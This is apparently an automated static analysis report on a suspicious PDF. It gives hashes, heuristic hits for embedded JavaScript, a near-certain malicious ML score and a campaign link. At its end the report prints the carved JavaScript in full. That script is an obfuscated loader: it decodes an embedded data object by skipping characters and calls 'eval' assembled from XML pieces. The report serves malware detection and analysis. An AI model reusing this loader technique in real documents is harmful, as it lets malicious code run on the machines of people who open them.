PDF static analysis report

Static analysis result for SHA-256 58ff043d59fe7446…

SUSPICIOUS

PDF

2.8 KB First seen: 2026-05-04
MD5: 05d5eb501aac801c7ce5a3d92d2c53dc SHA-1: e4c43ffa90a6194868d671c01823a4da6bfa21c6 SHA-256: 58ff043d59fe7446c7aae5154953bc3d1481ebc0fcb4297f1555ea9b26b8bcd4
54 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML_NYX_PDF_MALICIOUS heuristic strongly suggests malicious intent. The embedded JavaScript file, 'javascript_obj0007_000.js', is the primary indicator of malicious activity, likely serving to download and execute a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign: shared payload 1bc4bf38a7 55 samples

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1CC 254 bytes
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6
Preview script
First 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){   rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd);        rf=re.one.value+re.two.value;this[rf](rc);